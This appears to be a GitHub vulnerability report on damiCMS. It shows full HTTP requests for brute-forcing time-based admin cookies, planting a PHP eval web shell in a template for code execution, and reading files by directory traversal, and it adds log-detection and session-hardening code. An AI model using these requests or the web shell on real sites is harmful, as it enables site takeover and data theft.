Get a damiCMS's admin permission by Force authentication #2

Open
howchen opened this issue Aug 29, 2018 · 1 comment
howchen commented Aug 29, 2018

PART 1: get the admin authentication

Here is a default damiCMS admin user's cookie:

```
Cookie: sitevisitscookie=1; dmid=d3c104a4-849c-463e-a9c6-6921467cda41; BkGOp9578O_think_template=default; member_uid=1; finecms-admin-login=admin; member_cookie=c0600cb471b0f5b646d8; PHPSESSID=v0cqnbup2d5cnp0is7rrp9gdt7; BkGOp9578O_1535522538=czoxOiIxIjs%3D
```

The `BkGOp9578O_1535522538=czoxOiIxIjs%3D` cookie is updated when the admin logs in.
"BkGOp9578O_" is the COOKIE_PREFIX by default, "1533522538" comes from the time() function in PHP, and the cookie is valid for 3 hours. This means we can get admin permission just by enumerating at most 10800 times if the admin has logged in.

1. Get a string from the time() function:

   genera.php:

   ```php
   <?php echo time(); ?>
   ```

2. Craft a request:

   ```http
   GET /damiCMS/admin.php?s=/Article/index HTTP/1.1
   Host: localhost:8899
   User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0
   Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
   Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
   Accept-Encoding: gzip, deflate
   Referer: http://localhost:8899/damiCMS/admin.php?s=/Index/index
   Cookie: sitevisitscookie=1; dmid=d3c104a4-849c-463e-a9c6-6921467cda41; BkGOp9578O_think_template=default; member_uid=1; finecms-admin-login=admin; member_cookie=c0600cb471b0f5b646d8; PHPSESSID=v0cqnbup2d5cnp0is7rrp9gdt7; BkGOp9578O_1535522538=czoxOiIxIjs%3D
   Connection: close
   Upgrade-Insecure-Requests: 1
   ```

3. Send it to Intruder and configure the Positions and Payloads,
   e.g. `BkGOp9578O_15355$22538$=czoxOiIxIjs%3D`

PART 2: Remote Code Execution

When logged in as admin (by Part 1), there is a Remote Code Execution vulnerability.

1. Edit and update the file `./Web/Tpl/default/head.html` with the code `<?php @eval($_GET["code"]);?>`:

   ```http
   POST /damiCMS/admin.php?s=/Tpl/Update.html HTTP/1.1
   Host: localhost:8899
   User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0
   Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
   Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
   Accept-Encoding: gzip, deflate
   Referer: http://localhost:8899/damiCMS/admin.php?s=Tpl/Add/id/.|Web|Tpl|default|head*html
   Content-Type: multipart/form-data; boundary=---------------------------76232591619489
   Content-Length: 3962
   Cookie: sitevisitscookie=1; dmid=d3c104a4-849c-463e-a9c6-6921467cda41; BkGOp9578O_think_template=default; member_uid=1; finecms-admin-login=admin; member_cookie=c0600cb471b0f5b646d8; PHPSESSID=v0cqnbup2d5cnp0is7rrp9gdt7; BkGOp9578O_1535522538=czoxOiIxIjs%3D
   Connection: close
   Upgrade-Insecure-Requests: 1

   -----------------------------76232591619489
   Content-Disposition: form-data; name="filename"

   ./Web/Tpl/default/head.html
   -----------------------------76232591619489
   Content-Disposition: form-data; name="content"

   <?php @eval($_GET["code"]); ?>
   -----------------------------76232591619489
   Content-Disposition: form-data; name="submit"

   � �
   -----------------------------76232591619489--
   ```

2. Visit the URL below:

   http://localhost:8899/damiCMS/index.php?cmd=phpinfo();

PART 3: Directory Traversal

When logged in as admin (by Part 1), there is a Directory Traversal vulnerability.
Read the content of c:/windows/win.ini:

```http
GET /damiCMS/admin.php?s=Tpl/Add/id/c:|windows|win.ini HTTP/1.1
Host: localhost:8899
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://localhost:8899/damiCMS/admin.php?s=Tpl/index/id/.|Web|Tpl|default
Cookie: sitevisitscookie=1; dmid=d3c104a4-849c-463e-a9c6-6921467cda41; BkGOp9578O_think_template=default; member_uid=1; finecms-admin-login=admin; member_cookie=c0600cb471b0f5b646d8; PHPSESSID=v0cqnbup2d5cnp0is7rrp9gdt7; BkGOp9578O_1535522538=czoxOiIxIjs%3D
Connection: close
Upgrade-Insecure-Requests: 1
```
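For anyone running damiCMS, the three parts above each leave a distinct trace in web server logs: a client cycling through many `BkGOp9578O_<time>` cookie names (Part 1), a POST to `Tpl/Update` followed by PHP-looking code in a query string (Part 2), and a `Tpl/Add/id/` request whose `|`-encoded path leaves `Web/Tpl` (Part 3). The script below is an added detection example written for this thread; it is not damiCMS code and not the issue author's. It assumes a constructed log format in which the server records the Cookie header (`<ISO time> <client IP> <method> <path> <status> "<Cookie header>"`), and the sample lines it runs on are constructed to mirror the requests shown in the issue.

```python
"""Detection logic for the three behaviours described in this issue, run over
constructed sample log lines. Added example; not damiCMS code and not the issue
author's. Assumed log format: <ISO time> <client IP> <method> <path> <status> "<Cookie>"."""
import posixpath
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, unquote, urlsplit

LOG_RE = re.compile(r'^(?P<ts>\S+) (?P<ip>\S+) (?P<method>[A-Z]+) (?P<path>\S+) '
                    r'(?P<status>\d{3}) "(?P<cookie>[^"]*)"$')
# Cookie names of the form <COOKIE_PREFIX>_<unix time>, e.g. BkGOp9578O_1535522538
TS_COOKIE_RE = re.compile(r'^[A-Za-z0-9]+_\d{10}$')
# Template editor routes from the issue: admin.php?s=Tpl/Add/id/<encoded path>
TPL_ID_RE = re.compile(r'Tpl/(?:Add|index)/id/([^/?&]+)')
# A query value that looks like a PHP call, e.g. cmd=phpinfo();
PHP_CALL_RE = re.compile(r'[A-Za-z_]\w*\s*\(')

ENUM_WINDOW_SECONDS = 60   # window for counting distinct <prefix>_<time> names per client
ENUM_THRESHOLD = 20        # a real admin carries one such name; a guesser carries many


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['ts'] = datetime.strptime(rec['ts'], '%Y-%m-%dT%H:%M:%S')
    rec['cookie_names'] = [c.split('=', 1)[0].strip()
                           for c in rec['cookie'].split(';') if '=' in c]
    return rec


def decode_tpl_id(raw):
    """The editor encodes the template path with '|' for '/' and '*' for '.'."""
    return unquote(raw).replace('|', '/').replace('*', '.')


def template_path_is_safe(decoded):
    """True only if the normalised path stays inside Web/Tpl and names an .html file."""
    norm = posixpath.normpath(decoded)
    return (norm.startswith('Web/Tpl/') and norm.endswith('.html')
            and ':' not in norm and '\\' not in norm)


def analyze(lines):
    alerts = []
    first_seen = defaultdict(dict)   # ip -> {cookie name: first time seen}
    enum_reported = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, path = rec['ip'], rec['ts'], unquote(rec['path'])

        # Part 1: many distinct <prefix>_<time> cookie names from one client in a short window
        for name in rec['cookie_names']:
            if TS_COOKIE_RE.match(name):
                first_seen[ip].setdefault(name, ts)
        recent = [n for n, t in first_seen[ip].items()
                  if (ts - t).total_seconds() <= ENUM_WINDOW_SECONDS]
        if len(recent) >= ENUM_THRESHOLD and ip not in enum_reported:
            enum_reported.add(ip)
            alerts.append({'rule': 'cookie-name-enumeration', 'ip': ip,
                           'detail': f'{len(recent)} names in {ENUM_WINDOW_SECONDS}s'})

        # Part 3: the template editor was asked for a path outside Web/Tpl
        m = TPL_ID_RE.search(path)
        if m:
            decoded = decode_tpl_id(m.group(1))
            if not template_path_is_safe(decoded):
                alerts.append({'rule': 'template-path-traversal', 'ip': ip, 'detail': decoded})

        # Part 2: template writes are rare and high impact, so each one is an audit event
        if rec['method'] == 'POST' and 'Tpl/Update' in path:
            alerts.append({'rule': 'template-modified', 'ip': ip, 'detail': path})

        # Part 2: PHP-looking code arriving in a query parameter (a planted eval() in use)
        for key, values in parse_qs(urlsplit(path).query).items():
            for value in values:
                if PHP_CALL_RE.search(value):
                    alerts.append({'rule': 'code-in-query', 'ip': ip, 'detail': f'{key}={value}'})
    return alerts


def build_sample_log():
    """Constructed sample traffic (not real logs) mirroring the requests in this issue."""
    base = datetime(2018, 8, 29, 10, 0, 0)
    admin = 'PHPSESSID=v0cqnbup2d5cnp0is7rrp9gdt7; BkGOp9578O_1535522538=czoxOiIxIjs%3D'
    lines = []

    def log(offset, ip, method, path, status, cookie):
        t = (base + timedelta(seconds=offset)).strftime('%Y-%m-%dT%H:%M:%S')
        lines.append(f'{t} {ip} {method} {path} {status} "{cookie}"')

    # normal admin activity, including a legitimate edit of head.html (must not alert)
    log(0, '198.51.100.7', 'GET', '/damiCMS/admin.php?s=/Article/index', 200, admin)
    log(5, '198.51.100.7', 'GET', '/damiCMS/admin.php?s=Tpl/Add/id/.|Web|Tpl|default|head*html', 200, admin)
    # Part 1: one client presenting 25 candidate BkGOp9578O_<time> names within 30 s
    for i in range(25):
        log(100 + i, '203.0.113.5', 'GET', '/damiCMS/admin.php?s=/Article/index', 302,
            f'PHPSESSID=v0cqnbup2d5cnp0is7rrp9gdt7; BkGOp9578O_{1535522500 + i}=czoxOiIxIjs%3D')
    # Part 3: editor path pointing at c:/windows/win.ini
    log(200, '203.0.113.5', 'GET', '/damiCMS/admin.php?s=Tpl/Add/id/c:|windows|win.ini', 200, admin)
    # Part 2: template update, then PHP passed to the planted eval()
    log(210, '203.0.113.5', 'POST', '/damiCMS/admin.php?s=/Tpl/Update.html', 200, admin)
    log(220, '203.0.113.5', 'GET', '/damiCMS/index.php?cmd=phpinfo();', 200, '')
    return lines


if __name__ == '__main__':
    for alert in analyze(build_sample_log()):
        print(alert)
```

The enumeration rule keys on the count of distinct timestamp-style cookie names per client rather than on any one name, so it still fires if the prefix is changed from the default, and `template_path_is_safe` normalises the decoded path before checking it so that `..` segments and drive letters are both rejected.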
@cchaoming

no use how to into admin backend and edit
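The root cause in Part 1 is that the login marker's name is derived from `time()` and its value is constant (`czoxOiIxIjs%3D` is the base64 of the PHP-serialized string `s:1:"1";`), so the whole 3-hour validity window is only 10800 candidates and there is no cost to a wrong guess. The following is an added example, in Python rather than damiCMS's PHP, of what a fixed marker looks like: a random token from the OS CSPRNG, a server-side record with expiry, constant-time comparison, and a per-client failure counter so that guessing is both hopeless and noisy. The names `SessionStore`, `issue` and `validate` are this example's own, not damiCMS's.

```python
"""Hardened login marker, contrasted with the BkGOp9578O_<time()> cookie from Part 1.
Added example in Python, not damiCMS's PHP. Assumed names: SessionStore, issue(),
validate(). The weak scheme is reproduced only to make its search space explicit."""
import hmac
import secrets
import time
from dataclasses import dataclass, field
from typing import Callable, Dict, Optional, Tuple

LOGIN_TTL_SECONDS = 3 * 3600   # the 3-hour validity mentioned in the issue
MAX_FAILURES = 10              # wrong markers tolerated per client before a lockout
LOCKOUT_SECONDS = 900


def weak_login_cookie(now: int, prefix: str = 'BkGOp9578O_') -> Tuple[str, str]:
    """The pattern described in the issue: name = prefix + time(), value = PHP
    serialize("1"), whose base64 form is the czoxOiIxIjs= seen in the cookie.
    Every second of the 3-hour validity is one candidate name, hence 10800 at most."""
    return f'{prefix}{now}', 's:1:"1";'


@dataclass
class SessionStore:
    clock: Callable[[], float] = time.time
    sessions: Dict[str, Tuple[int, float]] = field(default_factory=dict)  # token -> (user, expires_at)
    failures: Dict[str, Tuple[int, float]] = field(default_factory=dict)  # ip -> (count, locked_until)

    def issue(self, user_id: int) -> str:
        """Random 256-bit token from the OS CSPRNG; nothing about it is derived from the clock."""
        token = secrets.token_urlsafe(32)
        self.sessions[token] = (user_id, self.clock() + LOGIN_TTL_SECONDS)
        return token

    def is_locked(self, ip: str) -> bool:
        _, locked_until = self.failures.get(ip, (0, 0.0))
        return locked_until > self.clock()

    def _record_failure(self, ip: str) -> None:
        count, locked_until = self.failures.get(ip, (0, 0.0))
        count += 1
        if count >= MAX_FAILURES:   # too many bad markers: stop answering this client for a while
            count, locked_until = 0, self.clock() + LOCKOUT_SECONDS
        self.failures[ip] = (count, locked_until)

    def validate(self, token: str, ip: str) -> Optional[int]:
        """Return the user id for a live token, else None (and count the failure)."""
        if self.is_locked(ip):
            return None
        now = self.clock()
        for stored, (user_id, expires_at) in list(self.sessions.items()):
            if hmac.compare_digest(stored.encode(), token.encode()):   # constant-time compare
                if expires_at > now:
                    self.failures.pop(ip, None)
                    return user_id
                del self.sessions[stored]   # expired: drop it and treat the attempt as a failure
                break
        self._record_failure(ip)
        return None


if __name__ == '__main__':
    store = SessionStore()
    t = store.issue(1)
    print('valid:', store.validate(t, '198.51.100.7'))
    print('wrong token:', store.validate('guess', '203.0.113.5'))
```

The lockout is keyed by client address only for simplicity; in a real deployment it would also be worth counting failures globally, since the weak scheme fails just as badly against a distributed guesser. The `clock` field exists so that expiry and lockout can be exercised with a fake clock in tests.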
